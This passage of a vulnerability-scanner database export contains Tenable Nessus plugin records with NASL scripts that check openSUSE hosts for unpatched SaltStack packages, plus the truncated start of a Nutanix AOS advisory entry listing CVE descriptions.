"p-cpe:/a:novell:opensuse:salt", "p-cpe:/a:novell:opensuse:salt-api", "p-cpe:/a:novell:opensuse:salt-bash-completion", "p-cpe:/a:novell:opensuse:salt-cloud", "p-cpe:/a:novell:opensuse:salt-fish-completion", "p-cpe:/a:novell:opensuse:salt-master", "p-cpe:/a:novell:opensuse:salt-minion", "p-cpe:/a:novell:opensuse:salt-proxy", "p-cpe:/a:novell:opensuse:salt-ssh", "p-cpe:/a:novell:opensuse:salt-standalone-formulas-configuration", "p-cpe:/a:novell:opensuse:salt-syndic", "p-cpe:/a:novell:opensuse:salt-transactional-update", "p-cpe:/a:novell:opensuse:salt-zsh-completion", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-899.NASL", "href": "https://www.tenable.com/plugins/nessus/151062", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:0899-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151062);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2018-15750\",\n \"CVE-2018-15751\",\n \"CVE-2020-11651\",\n \"CVE-2020-11652\",\n \"CVE-2020-25592\",\n \"CVE-2021-25315\",\n \"CVE-2021-31607\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0524-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0134\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"openSUSE 15 Security Update : salt (openSUSE-SU-2021:0899-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by multiple vulnerabilities as referenced in\nthe openSUSE-SU-2021:0899-1 advisory.\n\n - Directory Traversal vulnerability in salt-api in SaltStack Salt before 2017.7.8 and 2018.3.x before\n 2018.3.3 allows remote attackers to determine which files exist on the server. (CVE-2018-15750)\n\n - SaltStack Salt before 2017.7.8 and 2018.3.x before 2018.3.3 allow remote attackers to bypass\n authentication and execute arbitrary commands via salt-api(netapi). (CVE-2018-15751)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process\n ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods\n without authentication. These methods can be used to retrieve user tokens from the salt master and/or run\n arbitrary commands on salt minions. (CVE-2020-11651)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process\n ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow\n arbitrary directory access to authenticated users. (CVE-2020-11652)\n\n - In SaltStack Salt through 3002, salt-netapi improperly validates eauth credentials and tokens. A user can\n bypass authentication and invoke Salt SSH. (CVE-2020-25592)\n\n - A Incorrect Implementation of Authentication Algorithm vulnerability in of SUSE SUSE Linux Enterprise\n Server 15 SP 3; openSUSE Tumbleweed allows local attackers to execute arbitrary code via salt without the\n need to specify valid credentials. This issue affects: SUSE SUSE Linux Enterprise Server 15 SP 3 salt\n versions prior to 3002.2-3. openSUSE Tumbleweed salt version 3002.2-2.1 and prior versions.\n (CVE-2021-25315)\n\n - In SaltStack Salt 2016.9 through 3002.6, a command injection vulnerability exists in the snapper module\n that allows for local privilege escalation on a minion. The attack requires that a file is created with a\n pathname that is backed up by snapper, and that the master calls the snapper.diff function (which executes\n popen unsafely). (CVE-2021-31607)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1171257\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1176293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1179831\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1181368\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1182281\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1182293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1182382\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1185092\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1185281\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186674\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/6E3YAO2VV3WBUS7PMAT26ZYDS3AXW5VL/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d1637da9\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-15750\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-15751\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11651\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11652\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-25592\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-25315\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-31607\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25592\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt REST API Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-bash-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-fish-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-transactional-update\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-zsh-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nos_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.2', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\npkgs = [\n {'reference':'python3-salt-3002.2-lp152.3.36.1', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-3002.2-lp152.3.36.1', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-api-3002.2-lp152.3.36.1', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-bash-completion-3002.2-lp152.3.36.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-cloud-3002.2-lp152.3.36.1', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-fish-completion-3002.2-lp152.3.36.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-master-3002.2-lp152.3.36.1', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-minion-3002.2-lp152.3.36.1', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-proxy-3002.2-lp152.3.36.1', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-ssh-3002.2-lp152.3.36.1', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-standalone-formulas-configuration-3002.2-lp152.3.36.1', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-syndic-3002.2-lp152.3.36.1', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-transactional-update-3002.2-lp152.3.36.1', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'salt-zsh-completion-3002.2-lp152.3.36.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n cpu = NULL;\n rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'python3-salt / salt / salt-api / salt-bash-completion / salt-cloud / etc');\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:52:06", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by multiple vulnerabilities as referenced in the openSUSE-SU-2021:2106-1 advisory.\n\n - Directory Traversal vulnerability in salt-api in SaltStack Salt before 2017.7.8 and 2018.3.x before 2018.3.3 allows remote attackers to determine which files exist on the server. (CVE-2018-15750)\n\n - SaltStack Salt before 2017.7.8 and 2018.3.x before 2018.3.3 allow remote attackers to bypass authentication and execute arbitrary commands via salt-api(netapi). (CVE-2018-15751)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions. (CVE-2020-11651)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users. (CVE-2020-11652)\n\n - In SaltStack Salt through 3002, salt-netapi improperly validates eauth credentials and tokens. A user can bypass authentication and invoke Salt SSH. (CVE-2020-25592)\n\n - A Incorrect Implementation of Authentication Algorithm vulnerability in of SUSE SUSE Linux Enterprise Server 15 SP 3; openSUSE Tumbleweed allows local attackers to execute arbitrary code via salt without the need to specify valid credentials. This issue affects: SUSE SUSE Linux Enterprise Server 15 SP 3 salt versions prior to 3002.2-3. openSUSE Tumbleweed salt version 3002.2-2.1 and prior versions.\n (CVE-2021-25315)\n\n - In SaltStack Salt 2016.9 through 3002.6, a command injection vulnerability exists in the snapper module that allows for local privilege escalation on a minion. The attack requires that a file is created with a pathname that is backed up by snapper, and that the master calls the snapper.diff function (which executes popen unsafely). (CVE-2021-31607)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-16T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : salt (openSUSE-SU-2021:2106-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15750", "CVE-2018-15751", "CVE-2020-11651", "CVE-2020-11652", "CVE-2020-25592", "CVE-2021-25315", "CVE-2021-31607"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:python2-distro", "p-cpe:/a:novell:opensuse:python3-distro", "cpe:/o:novell:opensuse:15.3"], "id": "OPENSUSE-2021-2106.NASL", "href": "https://www.tenable.com/plugins/nessus/151732", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:2106-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151732);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2018-15750\",\n \"CVE-2018-15751\",\n \"CVE-2020-11651\",\n \"CVE-2020-11652\",\n \"CVE-2020-25592\",\n \"CVE-2021-25315\",\n \"CVE-2021-31607\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0524-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0134\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"openSUSE 15 Security Update : salt (openSUSE-SU-2021:2106-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by multiple vulnerabilities as referenced in\nthe openSUSE-SU-2021:2106-1 advisory.\n\n - Directory Traversal vulnerability in salt-api in SaltStack Salt before 2017.7.8 and 2018.3.x before\n 2018.3.3 allows remote attackers to determine which files exist on the server. (CVE-2018-15750)\n\n - SaltStack Salt before 2017.7.8 and 2018.3.x before 2018.3.3 allow remote attackers to bypass\n authentication and execute arbitrary commands via salt-api(netapi). (CVE-2018-15751)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process\n ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods\n without authentication. These methods can be used to retrieve user tokens from the salt master and/or run\n arbitrary commands on salt minions. (CVE-2020-11651)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process\n ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow\n arbitrary directory access to authenticated users. (CVE-2020-11652)\n\n - In SaltStack Salt through 3002, salt-netapi improperly validates eauth credentials and tokens. A user can\n bypass authentication and invoke Salt SSH. (CVE-2020-25592)\n\n - A Incorrect Implementation of Authentication Algorithm vulnerability in of SUSE SUSE Linux Enterprise\n Server 15 SP 3; openSUSE Tumbleweed allows local attackers to execute arbitrary code via salt without the\n need to specify valid credentials. This issue affects: SUSE SUSE Linux Enterprise Server 15 SP 3 salt\n versions prior to 3002.2-3. openSUSE Tumbleweed salt version 3002.2-2.1 and prior versions.\n (CVE-2021-25315)\n\n - In SaltStack Salt 2016.9 through 3002.6, a command injection vulnerability exists in the snapper module\n that allows for local privilege escalation on a minion. The attack requires that a file is created with a\n pathname that is backed up by snapper, and that the master calls the snapper.diff function (which executes\n popen unsafely). (CVE-2021-31607)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1171257\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1176293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1179831\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1181368\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1182281\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1182293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1182382\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1185092\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1185281\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186674\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/MU6P3NIODW6ZMC4HZLBROO6ZEOD5KAUX/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?410d07bc\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-15750\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-15751\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11651\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11652\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-25592\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-25315\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-31607\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected python2-distro and / or python3-distro packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25592\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt REST API Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python2-distro\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-distro\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nos_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\npkgs = [\n {'reference':'python2-distro-1.5.0-3.5.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-distro-1.5.0-3.5.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n cpu = NULL;\n rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'python2-distro / python3-distro');\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-10T19:27:53", "description": "The version of AOS installed on the remote host is prior to 6.0.2.5. It is, therefore, affected by multiple vulnerabilities as referenced in the NXSA-AOS-6.0.2.5 advisory.\n\n - xpointer.c in libxml2 before 2.9.5 (as used in Apple iOS before 10, OS X before 10.12, tvOS before 10, and watchOS before 3, and other products) does not forbid namespace nodes in XPointer ranges, which allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free and memory corruption) via a crafted XML document. (CVE-2016-4658)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions. (CVE-2020-11651)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users. (CVE-2020-11652)\n\n - An issue was discovered in the Linux kernel before 5.10. drivers/infiniband/core/ucma.c has a use-after- free because the ctx is reached via the ctx_list in some ucma_migrate_id situations where ucma_close is called, aka CID-f5449e74802c. (CVE-2020-36385)\n\n - A flaw was found in RPM's signature check functionality when reading a package file. This flaw allows an attacker who can convince a victim to install a seemingly verifiable package, whose signature header was modified, to cause RPM database corruption and execute code. The highest threat from this vulnerability is to data integrity, confidentiality, and system availability. (CVE-2021-20271)\n\n - An issue was discovered in Linux: KVM through Improper handling of VM_IO|VM_PFNMAP vmas in KVM can bypass RO checks and can lead to pages being freed while still accessible by the VMM and guest. This allows users with the ability to start and control a VM to read/write random pages of memory and can result in local privilege escalation. (CVE-2021-22543)\n\n - Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash.\n OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i).\n Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x). (CVE-2021-23840)\n\n - The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x). (CVE-2021-23841)\n\n - A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65. (CVE-2021-30640)\n\n - 